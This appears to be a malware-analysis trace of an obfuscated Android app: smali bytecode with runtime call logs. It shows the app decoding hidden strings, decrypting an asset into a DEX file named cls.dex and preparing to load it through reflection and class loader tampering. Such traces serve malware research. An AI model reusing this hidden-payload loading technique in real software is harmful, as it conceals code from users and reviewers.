    • p1: [Ljava.lang.Object;@9bcdbc7
    • Return:
      • 581760
106move-result-object v26
107check-cast v26, Ljava/lang/Integer;
109invoke-virtual/range {v26 .. v26}, Ljava/lang/Integer;->intValue()I
110move-result v26
111move/from16 v0, v26
112new-array v13, v0, [B
114const-string v26, "CRABFlweBE03HhsX"
115move-object/from16 v0, p0
116move-object/from16 v1, v26
118invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
119move-result-object v26
121invoke-static/range {v26 .. v26}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 44067
    • p0: java.io.File
    • Return:
      • class java.io.File
      • getName: java.io.File
122move-result-object v26
123const/16 v27, 0x1
124move/from16 v0, v27
125new-array v0, v0, [Ljava/lang/Class;
126move-object/from16 v27, v0
127const/16 v28, 0x0
129const-string v29, "CRABFlwbCg0WWSQGBQINFg=="
130move-object/from16 v0, p0
131move-object/from16 v1, v29
133invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
134move-result-object v29
136invoke-static/range {v29 .. v29}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 44085
    • p0: java.lang.String
    • Return:
      • class java.lang.String
      • getName: java.lang.String
137move-result-object v29
138aput-object v29, v27, v28
140invoke-virtual/range {v26 .. v27}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
141move-result-object v26
142const/16 v27, 0x1
143move/from16 v0, v27
144new-array v0, v0, [Ljava/lang/Object;
145move-object/from16 v27, v0
146const/16 v28, 0x0
147new-instance v29, Ljava/lang/StringBuilder;
149invoke-direct/range {v29 .. v29}, Ljava/lang/StringBuilder;-><init>()V
151const-string v30, ""
153invoke-virtual/range {v29 .. v30}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
154move-result-object v29
156invoke-virtual/range {p0 .. p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
157move-result-object v30
159const-string v31, "BBQDMRsbDhA1HgU="
160move-object/from16 v0, p0
161move-object/from16 v1, v31
163invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
164move-result-object v31
165const/16 v32, 0x0
166move/from16 v0, v32
167new-array v0, v0, [Ljava/lang/Class;
168move-object/from16 v32, v0
170invoke-virtual/range {v30 .. v32}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 44102
    • This:
      • class etxtfvw.cqwwrwk
      • getName:etxtfvw.cqwwrwk
    • p0: getFilesDir
    • p1: [Ljava.lang.Class;@30ad25db
    • Return:
      • public java.io.File android.content.ContextWrapper.getFilesDir()
      • getName: getFilesDir
171move-result-object v30
172const/16 v31, 0x0
173move/from16 v0, v31
174new-array v0, v0, [Ljava/lang/Object;
175move-object/from16 v31, v0
176move-object/from16 v0, v30
177move-object/from16 v1, p0
178move-object/from16 v2, v31
180invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: etxtfvw.cqwwrwk.getFilesDir
    • This:
      • etxtfvw.cqwwrwk@32c17d93
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files
  • Time: 44116
    • This:
      • public java.io.File android.content.ContextWrapper.getFilesDir()
      • getName:getFilesDir
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@1e3c5b51
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files
181move-result-object v30
183invoke-virtual/range {v29 .. v30}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
184move-result-object v29
186const-string v30, "CRABFlweBE03HhsX"
187move-object/from16 v0, p0
188move-object/from16 v1, v30
190invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
191move-result-object v30
193invoke-static/range {v30 .. v30}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 44131
    • p0: java.io.File
    • Return:
      • class java.io.File
      • getName: java.io.File
194move-result-object v30
196const-string v31, "EBQHFgAWHwwD"
197move-object/from16 v0, p0
198move-object/from16 v1, v31
200invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
201move-result-object v31
203invoke-virtual/range {v30 .. v31}, Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field;
204move-result-object v30
205const/16 v31, 0x0
207invoke-virtual/range {v30 .. v31}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44154
    • This:
      • public static final java.lang.String java.io.File.separator
      • getName:separator
    • p0: null
    • Return:
      • /
208move-result-object v30
210invoke-virtual/range {v29 .. v30}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
211move-result-object v29
213const-string v30, "AB0EWRYSEw=="
214move-object/from16 v0, p0
215move-object/from16 v1, v30
217invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
218move-result-object v30
220invoke-virtual/range {v29 .. v30}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
221move-result-object v29
223invoke-virtual/range {v29 .. v29}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
224move-result-object v29
225aput-object v29, v27, v28
227invoke-virtual/range {v26 .. v27}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44177
    • This:
      • public java.io.File(java.lang.String)
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
228move-result-object v25
230invoke-virtual/range {v25 .. v25}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
231move-result-object v26
233const-string v27, "AAMSFgYSJQYGMR4eEg=="
234move-object/from16 v0, p0
235move-object/from16 v1, v27
237invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
238move-result-object v27
239const/16 v28, 0x0
240move/from16 v0, v28
241new-array v0, v0, [Ljava/lang/Class;
242move-object/from16 v28, v0
244invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 44190
    • This:
      • class java.io.File
      • getName:java.io.File
    • p0: createNewFile
    • p1: [Ljava.lang.Class;@2879bac1
    • Return:
      • public boolean java.io.File.createNewFile() throws java.io.IOException
      • getName: createNewFile
245move-result-object v26
246const/16 v27, 0x0
247move/from16 v0, v27
248new-array v0, v0, [Ljava/lang/Object;
249move-object/from16 v27, v0
250move-object/from16 v0, v26
251move-object/from16 v1, v25
252move-object/from16 v2, v27
254invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: java.io.File.createNewFile
    • This:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • Return:
      • true
  • Time: 44206
    • This:
      • public boolean java.io.File.createNewFile() throws java.io.IOException
      • getName:createNewFile
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • p1: [Ljava.lang.Object;@1843c9a7
    • Return:
      • true
256invoke-virtual/range {v16 .. v16}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
257move-result-object v26
259const-string v27, "ERQWEw=="
260move-object/from16 v0, p0
261move-object/from16 v1, v27
263invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
264move-result-object v27
265const/16 v28, 0x1
266move/from16 v0, v28
267new-array v0, v0, [Ljava/lang/Class;
268move-object/from16 v28, v0
269const/16 v29, 0x0
271const-string v30, "ODM="
272move-object/from16 v0, p0
273move-object/from16 v1, v30
275invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
276move-result-object v30
278invoke-static/range {v30 .. v30}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 44231
    • p0: [B
    • Return:
      • class [B
      • getName: [B
279move-result-object v30
280aput-object v30, v28, v29
282invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 44236
    • This:
      • class android.content.res.AssetManager$AssetInputStream
      • getName:android.content.res.AssetManager$AssetInputStream
    • p0: read
    • p1: [Ljava.lang.Class;@18ae469f
    • p1.Arrays.toString: [class [B]
    • Return:
      • public final int android.content.res.AssetManager$AssetInputStream.read(byte[]) throws java.io.IOException
      • getName: read
283move-result-object v26
284const/16 v27, 0x1
285move/from16 v0, v27
286new-array v0, v0, [Ljava/lang/Object;
287move-object/from16 v27, v0
288const/16 v28, 0x0
289aput-object v13, v27, v28
290move-object/from16 v0, v26
291move-object/from16 v1, v16
292move-object/from16 v2, v27
294invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: android.content.res.AssetManager$AssetInputStream.read
    • This:
      • android.content.res.AssetManager$AssetInputStream@29c881cf
    • p0: [B@11bbda4a
    • Return:
      • 581760
  • Time: 44255
    • This:
      • public final int android.content.res.AssetManager$AssetInputStream.read(byte[]) throws java.io.IOException
      • getName:read
    • p0: android.content.res.AssetManager$AssetInputStream@29c881cf
    • p1: [Ljava.lang.Object;@3870b3b5
    • p1.Arrays.toString: [[B@11bbda4a]
    • Return:
      • 581760
296invoke-virtual/range {v16 .. v16}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
297move-result-object v26
299const-string v27, "AB0YBBc="
300move-object/from16 v0, p0
301move-object/from16 v1, v27
303invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
304move-result-object v27
305const/16 v28, 0x0
306move/from16 v0, v28
307new-array v0, v0, [Ljava/lang/Class;
308move-object/from16 v28, v0
310invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 44267
    • This:
      • class android.content.res.AssetManager$AssetInputStream
      • getName:android.content.res.AssetManager$AssetInputStream
    • p0: close
    • p1: [Ljava.lang.Class;@135c6a97
    • Return:
      • public final void android.content.res.AssetManager$AssetInputStream.close() throws java.io.IOException
      • getName: close
311move-result-object v26
312const/16 v27, 0x0
313move/from16 v0, v27
314new-array v0, v0, [Ljava/lang/Object;
315move-object/from16 v27, v0
316move-object/from16 v0, v26
317move-object/from16 v1, v16
318move-object/from16 v2, v27
320invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: android.content.res.AssetManager$AssetInputStream.close
    • This:
      • android.content.res.AssetManager$AssetInputStream@29c881cf
    • Return:
      • null
  • Time: 44278
    • This:
      • public final void android.content.res.AssetManager$AssetInputStream.close() throws java.io.IOException
      • getName:close
    • p0: android.content.res.AssetManager$AssetInputStream@29c881cf
    • p1: [Ljava.lang.Object;@3e70a46d
    • Return:
      • null
322invoke-virtual/range {p0 .. p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
323move-result-object v26
325const-string v27, "ID87GxYwGg=="
326move-object/from16 v0, p0
327move-object/from16 v1, v27
329invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
330move-result-object v27
331const/16 v28, 0x1
332move/from16 v0, v28
333new-array v0, v0, [Ljava/lang/Class;
334move-object/from16 v28, v0
335const/16 v29, 0x0
337const-string v30, "ODM="
338move-object/from16 v0, p0
339move-object/from16 v1, v30
341invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
342move-result-object v30
344invoke-static/range {v30 .. v30}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 44305
    • p0: [B
    • Return:
      • class [B
      • getName: [B
345move-result-object v30
346aput-object v30, v28, v29
348invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 44317
    • This:
      • class etxtfvw.cqwwrwk
      • getName:etxtfvw.cqwwrwk
    • p0: CNLldGq
    • p1: [Ljava.lang.Class;@5c0f01c
    • p1.Arrays.toString: [class [B]
    • Return:
      • public [B etxtfvw.cqwwrwk.CNLldGq(byte[])
      • getName: CNLldGq
349move-result-object v26
350const/16 v27, 0x1
351move/from16 v0, v27
352new-array v0, v0, [Ljava/lang/Object;
353move-object/from16 v27, v0
354const/16 v28, 0x0
355aput-object v13, v27, v28
356move-object/from16 v0, v26
357move-object/from16 v1, p0
358move-object/from16 v2, v27
360invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: etxtfvw.cqwwrwk.CNLldGq
    • This:
      • etxtfvw.cqwwrwk@32c17d93
    • p0: [B@11bbda4a
    • Return:
      • [B@2ecbe6d1
      • dex035K>h/_#8.<pxV4lpKZ\^\LMP259SmsKG#25;>AEXjx(8BU^k ),FIT_kw#7G\ox/>HO
      • 6465780A303335000A4B043E0DF468862F5F23CDF29038EA2EB301C4A50E01063C920600700000007856341200000000000000006C910600E31200007000000088030000FC4B0000F00400001C5A0000A00700005C9500005E0F00005CD20000150200004C4D010050020500EC8F0100EC8F0100EE8F0100F18F0100F48F0100F88F010014900100329001003590010039900100539001006D90010073900100929001009F900100AC900100C2900100D5900100EA900100019101004B910100899101009C910100A7910100B3910100C2910100CC910100D9910100E9910100F8910100FF91010047920100859201008E920100959201009D920100A2920100A7920100AC920100B5920100BF920100CC920100D3920100D6920100D99201002393010032930100359301003B9301003E9301004193010045930100589301006A930100789301008B9301009E930100B2930100BE930100D3930100E8930100F79301000394010013940100289401003894010042940100559401005E9401006B9401008694010094940100A9940100B7940100D0940100E9940100FC9401001795010020950100299501002C9501004695010049950100549501005F9501006B9501007795010083950100909501009D950100AA950100B8950100C6950100CC950100D1950100DA950100E0950100EB950100F1950100F8950100FE950100
  • Time: 45087
    • This:
      • public [B etxtfvw.cqwwrwk.CNLldGq(byte[])
      • getName:CNLldGq
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@23cb2536
    • p1.Arrays.toString: [[B@11bbda4a]
    • Return:
      • [B@2ecbe6d1
      • dex035K>h/_#8.<pxV4lpKZ\^\LMP259SmsKG#25;>AEXjx(8BU^k ),FIT_kw#7G\ox/>HO
      • 6465780A303335000A4B043E0DF468862F5F23CDF29038EA2EB301C4A50E01063C920600700000007856341200000000000000006C910600E31200007000000088030000FC4B0000F00400001C5A0000A00700005C9500005E0F00005CD20000150200004C4D010050020500EC8F0100EC8F0100EE8F0100F18F0100F48F0100F88F010014900100329001003590010039900100539001006D90010073900100929001009F900100AC900100C2900100D5900100EA900100019101004B910100899101009C910100A7910100B3910100C2910100CC910100D9910100E9910100F8910100FF91010047920100859201008E920100959201009D920100A2920100A7920100AC920100B5920100BF920100CC920100D3920100D6920100D99201002393010032930100359301003B9301003E9301004193010045930100589301006A930100789301008B9301009E930100B2930100BE930100D3930100E8930100F79301000394010013940100289401003894010042940100559401005E9401006B9401008694010094940100A9940100B7940100D0940100E9940100FC9401001795010020950100299501002C9501004695010049950100549501005F9501006B9501007795010083950100909501009D950100AA950100B8950100C6950100CC950100D1950100DA950100E0950100EB950100F1950100F8950100FE950100
361move-result-object v26
362check-cast v26, [B
363move-object/from16 v0, v26
364check-cast v0, [B
365move-object v10, v0
367const-string v26, "CRABFlweBE03HhsXOB4XAQIDIQMZBhAa"
368move-object/from16 v0, p0
369move-object/from16 v1, v26
371invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
372move-result-object v26
374invoke-static/range {v26 .. v26}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 45241
    • p0: java.io.FileOutputStream
    • Return:
      • class java.io.FileOutputStream
      • getName: java.io.FileOutputStream
375move-result-object v26
376const/16 v27, 0x1
377move/from16 v0, v27
378new-array v0, v0, [Ljava/lang/Class;
379move-object/from16 v27, v0
380const/16 v28, 0x0
382const-string v29, "CRABFlweBE03HhsX"
383move-object/from16 v0, p0
384move-object/from16 v1, v29
386invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
387move-result-object v29
389invoke-static/range {v29 .. v29}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 45248
    • p0: java.io.File
    • Return:
      • class java.io.File
      • getName: java.io.File
390move-result-object v29
391aput-object v29, v27, v28
393invoke-virtual/range {v26 .. v27}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
394move-result-object v26
395const/16 v27, 0x1
396move/from16 v0, v27
397new-array v0, v0, [Ljava/lang/Object;
398move-object/from16 v27, v0
399const/16 v28, 0x0
400aput-object v25, v27, v28
402invoke-virtual/range {v26 .. v27}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 45258
    • This:
      • public java.io.FileOutputStream(java.io.File) throws java.io.FileNotFoundException
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files/cls.dex
    • Return:
      • java.io.FileOutputStream@2895bb2f
403move-result-object v15
404sget v26, Landroid/os/Build$VERSION;->SDK_INT:I
405try_end_27f: const/16 v27, 0xe
406move/from16 v0, v26
407move/from16 v1, v27
408if-ge v0, v1, :cond_467
409try_start_287:
410const-string v26, "CRABFlwCHwodWQ0bB0U5GAc4BwMbFgUkAwASCg4="
411move-object/from16 v0, p0
412move-object/from16 v1, v26
414invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
415move-result-object v26
417invoke-static/range {v26 .. v26}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
418move-result-object v26
419const/16 v27, 0x1
420move/from16 v0, v27
421new-array v0, v0, [Ljava/lang/Class;
422move-object/from16 v27, v0
423const/16 v28, 0x0
425const-string v29, "CRABFlweBE0zAhEUEhkGFTgCBgceFyIDBRcWBg=="
426move-object/from16 v0, p0
427move-object/from16 v1, v29
429invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
430move-result-object v29
432invoke-static/range {v29 .. v29}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
433move-result-object v29
434aput-object v29, v27, v28
436invoke-virtual/range {v26 .. v27}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
437move-result-object v26
438const/16 v27, 0x1
439move/from16 v0, v27
440new-array v0, v0, [Ljava/lang/Object;
441move-object/from16 v27, v0
442const/16 v28, 0x0
444const-string v29, "CRABFlweBE0zAhEUEhkGFTgCBgceFyIDBRcWBg=="
445move-object/from16 v0, p0
446move-object/from16 v1, v29
448invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
449move-result-object v29
451invoke-static/range {v29 .. v29}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
452move-result-object v29
453const/16 v30, 0x1
454move/from16 v0, v30
455new-array v0, v0, [Ljava/lang/Class;
456move-object/from16 v30, v0
457const/16 v31, 0x0
459const-string v32, "CRABFlweBE03HhsXOB4XAQIDIQMZBhAa"
460move-object/from16 v0, p0
461move-object/from16 v1, v32
463invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
464move-result-object v32
466invoke-static/range {v32 .. v32}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
467move-result-object v32
468aput-object v32, v30, v31
470invoke-virtual/range {v29 .. v30}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
471move-result-object v29
472const/16 v30, 0x1
473move/from16 v0, v30
474new-array v0, v0, [Ljava/lang/Object;
475move-object/from16 v30, v0
476const/16 v31, 0x0
477aput-object v15, v30, v31
479invoke-virtual/range {v29 .. v30}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
480move-result-object v29
481aput-object v29, v27, v28
483invoke-virtual/range {v26 .. v27}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
484move-result-object v20
486const-string v26, "CRABFlwCHwodWQ0bB0U5GAcyHAMZGg=="
487move-object/from16 v0, p0
488move-object/from16 v1, v26
490invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
491move-result-object v26
493invoke-static/range {v26 .. v26}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
494move-result-object v26
495const/16 v27, 0x1
496move/from16 v0, v27
497new-array v0, v0, [Ljava/lang/Class;
498move-object/from16 v27, v0
499const/16 v28, 0x0
501const-string v29, "CRABFlwbCg0WWSQGBQINFg=="
502move-object/from16 v0, p0
503move-object/from16 v1, v29
505invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
506move-result-object v29
508invoke-static/range {v29 .. v29}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
509move-result-object v29
510aput-object v29, v27, v28
512invoke-virtual/range {v26 .. v27}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
513move-result-object v26
514const/16 v27, 0x1
515move/from16 v0, v27
516new-array v0, v0, [Ljava/lang/Object;
517move-object/from16 v27, v0
518const/16 v28, 0x0
520const-string v29, "AB0WBAESGE0VEg8="
521move-object/from16 v0, p0
522move-object/from16 v1, v29
524invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
525move-result-object v29
526aput-object v29, v27, v28
528invoke-virtual/range {v26 .. v27}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
529move-result-object v14
531invoke-virtual/range {v20 .. v20}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
532move-result-object v26
534const-string v27, "EwQDORcPHyYfAwUL"
535move-object/from16 v0, p0
536move-object/from16 v1, v27
538invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
539move-result-object v27
540const/16 v28, 0x1
541move/from16 v0, v28
542new-array v0, v0, [Ljava/lang/Class;
543move-object/from16 v28, v0
544const/16 v29, 0x0
546const-string v30, "CRABFlwCHwodWQ0bB0U5GAcyHAMZGg=="
547move-object/from16 v0, p0
548move-object/from16 v1, v30
550invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
551move-result-object v30
553invoke-static/range {v30 .. v30}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
554move-result-object v30
555aput-object v30, v28, v29
557invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
558move-result-object v26
559const/16 v27, 0x1
560move/from16 v0, v27
561new-array v0, v0, [Ljava/lang/Object;
562move-object/from16 v27, v0
563const/16 v28, 0x0
564aput-object v14, v27, v28
565move-object/from16 v0, v26
566move-object/from16 v1, v20
567move-object/from16 v2, v27
569invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
571invoke-virtual/range {v20 .. v20}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
572move-result-object v26
574const-string v27, "FAMeAxc="
575move-object/from16 v0, p0
576move-object/from16 v1, v27
578invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
579move-result-object v27
580const/16 v28, 0x1
581move/from16 v0, v28
582new-array v0, v0, [Ljava/lang/Class;
583move-object/from16 v28, v0
584const/16 v29, 0x0
586const-string v30, "ODM="
587move-object/from16 v0, p0
588move-object/from16 v1, v30
590invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
591move-result-object v30
593invoke-static/range {v30 .. v30}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
594move-result-object v30
595aput-object v30, v28, v29
597invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
598move-result-object v26
599const/16 v27, 0x1
600move/from16 v0, v27
601new-array v0, v0, [Ljava/lang/Object;
602move-object/from16 v27, v0
603const/16 v28, 0x0
604aput-object v10, v27, v28
605move-object/from16 v0, v26
606move-object/from16 v1, v20
607move-object/from16 v2, v27
609invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
611invoke-virtual/range {v20 .. v20}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
612move-result-object v26
614const-string v27, "AB0YBBc="
615move-object/from16 v0, p0
616move-object/from16 v1, v27
618invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
619move-result-object v27
620const/16 v28, 0x0
621move/from16 v0, v28
622new-array v0, v0, [Ljava/lang/Class;
623move-object/from16 v28, v0
625invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
626move-result-object v26
627const/16 v27, 0x0
628move/from16 v0, v27
629new-array v0, v0, [Ljava/lang/Object;
630move-object/from16 v27, v0
631move-object/from16 v0, v26
632move-object/from16 v1, v20
633move-object/from16 v2, v27
635invoke-virtual {v0, v1, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
636try_start_3f2:
637invoke-virtual {v15}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
638move-result-object v26
640const-string v27, "AB0YBBc="
641move-object/from16 v0, p0
642move-object/from16 v1, v27
644invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
645move-result-object v27
646const/16 v28, 0x0
647move/from16 v0, v28
648new-array v0, v0, [Ljava/lang/Class;
649move-object/from16 v28, v0
651invoke-virtual/range {v26 .. v28}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
652move-result-object v26
653const/16 v27, 0x0
654move/from16 v0, v27
655new-array v0, v0, [Ljava/lang/Object;
656move-object/from16 v27, v0
657move-object/from16 v0, v26
658move-object/from16 v1, v27
660invoke-virtual {v0, v15, v1}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
661goto_41b: const/4 v5, 0x0
662const/4 v9, 0x0
663goto_41d: if-nez v5, :cond_503
664if-nez v9, :cond_429
666invoke-virtual/range {p0 .. p0}, Letxtfvw/cqwwrwk;->getClassLoader()Ljava/lang/ClassLoader;
667move-result-object v26
669invoke-virtual/range {v26 .. v26}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
670try_end_428: move-result-object v9
671try_start_429:
672const-string v26, "ExAFEhwD"
673move-object/from16 v0, p0
674move-object/from16 v1, v26
676invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
677move-result-object v26
678move-object/from16 v0, v26
680invoke-virtual {v9, v0}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
  • Time: 45359
    • This:
      • class java.lang.ClassLoader
      • getName:java.lang.ClassLoader
    • p0: parent
    • Return:
      • private java.lang.ClassLoader java.lang.ClassLoader.parent
      • getName: parent
681try_end_438: move-result-object v5
682goto/16 :goto_41d
683catchall_43a: move-exception v26
684try_start_43b:
685invoke-virtual {v15}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
686move-result-object v27
688const-string v28, "AB0YBBc="
689move-object/from16 v0, p0
690move-object/from16 v1, v28
692invoke-virtual {v0, v1}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
693move-result-object v28
694const/16 v29, 0x0
695move/from16 v0, v29
